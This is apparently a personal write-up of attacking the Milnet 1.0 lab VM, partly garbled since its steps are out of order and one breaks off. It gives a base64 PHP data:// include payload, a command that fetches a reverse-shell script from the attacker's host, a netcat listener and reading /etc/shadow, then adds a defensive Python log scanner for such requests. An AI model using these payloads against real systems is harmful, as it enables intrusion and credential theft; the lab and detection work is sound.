Milnet 1.0 Vuln VM

Did the first part of a vulnerable vm. First part meaning got a reverse shell, but have not achieved root access.

  1. I fired up Burp and pressed one of the buttons to see the request. The requests had your basic headers, however, it had
  2. Dirbuster found 7 different php files. I attempted to navigate to each one but each file was just a piece of the website I had poked around to.
    • After messing around with those a little bit, and zooming in really far on an image I decided to move on.
  3. Next I browsed to the IP in my browser and saw a very basic web page, in German…
    • Poked around a little bit, and didn’t find much, no text boxes, no upload function. Popped it into dirbuster to see if anything lucky would come up.
  4. Quickly started up ncrack against the root user to see if I could get lucky.
  5. After booting the box I did a quick nmap scan and found port 22 (SSH) and port 80 (usually a web server).
    • route=index
      • At this particular moment I was on the 192.168.1.1/index.php
    • Tried a couple of the other links and sure enough, it just dropped the .php and set route=<suffix>.
    • Didn’t know what this meant at the time but started googling.
  6. I assumed I needed to find a way to run a command or something in php.
    • Also, I knew I needed some way to drop the “.php” that was appended to the end.
  7. I found a code snippet that looked like this
    • route=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOyA/Pg==
    • The last part is the base64 encoding of <?php system('ls'); ?>
  8. I started chucking random commands in there, was able to cat /etc/shadow and started a new ncrack on the user that was in there.
    • Spoiler alert: got nothing
  9. Was talking in the SDHackers slack channel about what next steps I should take and found out about something called a webshell.
    • Found one built into the Kali distro
    • Had to figure out a way to get this uploaded…
  10. Figured wget would be the best way to do it.
    • Had to boot up a SimpleHTTPServer with Python.
      • python -m SimpleHTTPServer
      • This command worked out of the box
  11. After I booted this server, I ran <?php system('wget http://192.168.1.185:8000/php-reverse-shell.php'); ?>
    • However this didn’t encode correctly… So I did this
    • <?php system('ls; wget http://192.168.1.185:8000/php-reverse-shell.php'); ?>
      • Good ol’ encoding.
  12. After that command was run through the burp repeater, I fired up a netcat listener.
    1. nc -lvp 4444
  13. Launched this url in my browser
    • 192.168.1.208/php-reverse-shell.php
  14. And blam, got a basic shell. Now I just need to privilege escalate.
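From the defender's side, the weakness behind the route= trick above is a page router that builds an include path from a request parameter (the app's code is not shown in the post, so that is an assumption; the data:// wrapper only works inside include when allow_url_include is on, and an allowlist of page names removes the problem entirely). The Python below is an added example, not code from the post or from the Milnet VM, showing what those requests look like in a web server's access log and how to triage them: it parses constructed Apache combined-format lines, flags route values carrying a stream wrapper, directory traversal or a null byte, decodes the base64 data: payload for the analyst, and flags hits on PHP files that were never deployed. The log lines, the deployed-file allowlist and the timestamps are all constructed.

```python
"""Access-log triage for the route= include abuse described in this writeup.

Added example; not code from the post or the Milnet VM. Log lines are constructed.
"""
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# PHP stream wrappers that have no business in a page/route parameter.
WRAPPER_SCHEMES = ("data:", "php:", "expect:", "phar:", "file:", "http:", "https:", "ftp:")

# Constructed allowlist of PHP files that belong to the deployed site
# (hypothetical; the real site's file names are not in the writeup).
DEPLOYED_PHP = {"/index.php"}

# Constructed Apache combined-format samples mirroring the writeup's steps.
SAMPLE_LOG = """\
192.168.1.185 - - [10/Oct/2016:12:00:01 +0000] "GET /index.php?route=index HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
192.168.1.185 - - [10/Oct/2016:12:00:05 +0000] "GET /index.php?route=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOyA/Pg== HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.185 - - [10/Oct/2016:12:00:09 +0000] "GET /index.php?route=../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "curl/7.50.1"
192.168.1.185 - - [10/Oct/2016:12:00:12 +0000] "GET /php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
DATA_B64_RE = re.compile(r"^data:(?://)?[^,]*;base64,(?P<b64>[A-Za-z0-9+/=]+)", re.I)


def query_params(target: str) -> Dict[str, str]:
    """Split the request target into percent-decoded query parameters.

    Done by hand rather than with urllib.parse.parse_qs so that the ';' inside a
    data: URI is never treated as a parameter separator (older Pythons did that).
    """
    params: Dict[str, str] = {}
    if "?" not in target:
        return params
    for pair in target.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def decode_data_payload(route: str) -> Optional[str]:
    """Recover the PHP source carried in a base64 data: include payload, if any."""
    m = DATA_B64_RE.match(route)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def analyze_route(route: str) -> List[str]:
    """Return the reasons a route value looks like include abuse (empty = benign)."""
    reasons: List[str] = []
    if route.lower().startswith(WRAPPER_SCHEMES):
        reasons.append("stream wrapper: " + route.split(":", 1)[0].lower())
    if "../" in route or "..\\" in route:
        reasons.append("directory traversal")
    if "\x00" in route:
        reasons.append("null byte (legacy .php suffix truncation)")
    # A page router should only ever see a plain token such as "index".
    if not reasons and not re.fullmatch(r"[A-Za-z0-9_-]+", route):
        reasons.append("route is not a plain page token")
    return reasons


def scan_log(text: str) -> List[Dict[str, object]]:
    """Flag suspicious route= values and hits on PHP files that were never deployed."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = m.group("target")
        path = target.split("?", 1)[0]
        route = query_params(target).get("route")
        reasons = analyze_route(route) if route is not None else []
        if path.endswith(".php") and path not in DEPLOYED_PHP:
            reasons.append("request to undeployed PHP file (possible dropped webshell)")
        if reasons:
            findings.append({
                "ip": m.group("ip"), "time": m.group("ts"), "target": target,
                "reasons": reasons,
                "payload": decode_data_payload(route) if route else None,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["reasons"], f["target"])
        if f["payload"]:
            print("  decoded payload:", f["payload"])
```

Run as a script it prints three findings; pointing it at a real combined-format access log only requires replacing SAMPLE_LOG and filling DEPLOYED_PHP with the files that are actually part of the site.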
